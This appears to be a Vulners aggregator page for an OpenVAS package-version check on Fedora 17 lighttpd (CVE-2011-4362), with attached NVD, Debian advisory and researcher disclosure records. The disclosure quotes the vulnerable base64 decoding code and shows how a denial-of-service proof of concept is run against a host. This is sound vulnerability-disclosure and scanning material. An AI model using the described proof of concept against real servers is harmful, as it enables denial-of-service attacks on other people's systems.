Search...

Fedora Update for lighttpd FEDORA-2012-9040

2012-08-30T00:00:00

ID OPENVAS:1361412562310864513
Type openvas
Reporter Copyright (c) 2012 Greenbone Networks GmbH
Modified 2019-03-15T00:00:00

Description

The remote host is missing an update for the

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for lighttpd FEDORA-2012-9040
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html");
  script_oid("1.3.6.1.4.1.25623.1.0.864513");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)");
  script_cve_id("CVE-2011-4362");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_xref(name:"FEDORA", value:"2012-9040");
  script_name("Fedora Update for lighttpd FEDORA-2012-9040");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'lighttpd'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
  script_tag(name:"affected", value:"lighttpd on Fedora 17");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC17")
{

  if ((res = isrpmvuln(pkg:"lighttpd", rpm:"lighttpd~1.4.31~1.fc17", rls:"FC17")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310864513", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "description": "The remote host is missing an update for the ", "published": "2012-08-30T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864513", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html", "2012-9040"], "cvelist": ["CVE-2011-4362"], "lastseen": "2019-05-29T18:38:46", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4362"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:27504"]}, {"type": "seebug", "idList": ["SSV:72453", "SSV:26120", "SSV:30003", "SSV:24275"]}, {"type": "amazon", "idList": ["ALAS-2012-107"]}, {"type": "openvas", "idList": ["OPENVAS:864513", "OPENVAS:864498", "OPENVAS:1361412562310120270", "OPENVAS:1361412562310864498", "OPENVAS:1361412562310121213", "OPENVAS:136141256231070584", "OPENVAS:70687", "OPENVAS:70584", "OPENVAS:136141256231070687"]}, {"type": "exploitdb", "idList": ["EDB-ID:18295"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E"]}, {"type": "freebsd", "idList": ["C6521B04-314B-11E1-9CF4-5404A67EEF98"]}, {"type": "nessus", "idList": ["OPENSUSE-2012-110.NASL", "ALA_ALAS-2012-107.NASL", "FEDORA_2012-9078.NASL", "GENTOO_GLSA-201406-10.NASL", "LIGHTTPD_1_4_30.NASL", "FEDORA_2012-9040.NASL", "DEBIAN_DSA-2368.NASL", "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "SUSE_11_4_LIGHTTPD-120130.NASL", "SOLARIS11_LIGHTTPD_20120417.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-17319"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2368-1:91542"]}, {"type": "gentoo", "idList": ["GLSA-201406-10"]}], "modified": "2019-05-29T18:38:46", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2019-05-29T18:38:46", "rev": 2}, "vulnersScore": 5.8}, "pluginID": "1361412562310864513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864513\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}

{"cve": [{"lastseen": "2020-12-09T19:39:12", "description": "Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.", "edition": 5, "cvss3": {}, "published": "2011-12-24T19:55:00", "title": "CVE-2011-4362", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4362"], "modified": "2018-11-29T14:38:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:lighttpd:lighttpd:1.5.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2011-4362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4362", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:lighttpd:lighttpd:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4362"], "description": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this vulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n Usage: ./p_cve-2011-4362 <options>\r\n\r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n\r\n [+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n.\r\n.\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u0417Yg\\u00a7\u041e\u044an\u0446Xt\u0455]rze\u043b\u042b\u0444\u0455gY\u0443\u043f\\u0440\u044fYb\u043eY(\u0457d\u042f\u0448r\u0426[Y\u0443\u044a\u0429-\u00b7xi\u044e\u0438i\u00b0k\u0412Wp\u041b\t]߶\u0448\u0442\\u0434\u0412\u0427@V\u0428\u0434\u00a6x\u0443\u044a\u042dize \r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27504", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2368-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nDec 20th, 2011 http://www.debian.org/security/faq\r\n- ---------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : multiple\r\nProblem type : remote\r\nDebian-specific: no\r\nDebian bug : 652726\r\nCVE IDs : CVE-2011-4362 CVE-2011-3389\r\n\r\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\r\nwebserver with minimal memory footprint.\r\n\r\nCVE-2011-4362\r\n\r\n Xi Wang discovered that the base64 decoding routine which is used to\r\n decode user input during an HTTP authentication, suffers of a signedness\r\n issue when processing user input. As a result it is possible to force\r\n lighttpd to perform an out-of-bounds read which results in Denial of\r\n Service conditions.\r\n\r\nCVE-2011-3389\r\n\r\n When using CBC ciphers on an SSL enabled virtual host to communicate with\r\n certain client, a so called "BEAST" attack allows man-in-the-middle\r\n attackers to obtain plaintext HTTP traffic via a blockwise\r\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\r\n no lighttpd vulnerability. However, lighttpd offers a workaround to\r\n mitigate this problem by providing a possibility to disable CBC ciphers.\r\n\r\n This updates includes this option by default. System administrators\r\n are advised to read the NEWS file of this update (as this may break older\r\n clients).\r\n\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.4.19+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.28-2+squeeze1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.30-1.\r\n\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk7xJ1MACgkQHYflSXNkfP+N5ACgtImneTJSdyEiCLnWTFA0uxzz\r\nqP0An07LJwL5K3NmrMRfKeCVpigpn1zR\r\n=QU3k\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27485", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "DoS on base64 parsing.", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12116", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12116", "title": "lighthttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T17:55:59", "description": "No description provided by source.", "published": "2012-01-02T00:00:00", "type": "seebug", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2012-01-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30003", "id": "SSV:30003", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n \r\n \r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n \r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n \r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n \r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n \r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n \r\nHow to run this very primitive Proof of Concept?\r\n \r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n Usage: ./p_cve-2011-4362 <options>\r\n \r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n \r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n \r\n [+] Check the website!\r\n \r\n$\r\n \r\nLighttpd will log this situation probably in error-log file like this:\r\n \r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd ]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n \r\n--- CUT ---\r\n \r\nMaybe you can find vulnerable binary?\r\n \r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n \r\n \r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30003", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:45", "description": "CVE-2011-4362\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\nlighttpd\u5728\u8ba4\u8bc1\u6570\u636e\u7684\u89e3\u7801\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nhttp_auth.c\u4e2d\u7684\u4ee3\u7801\u5728base64\u89e3\u7801\u7528\u6237\u8f93\u5165\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u4f7f\u7528"const char *in"\u7c7b\u578b\uff0c\u5e76\u5c06\u6bcf\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a"int 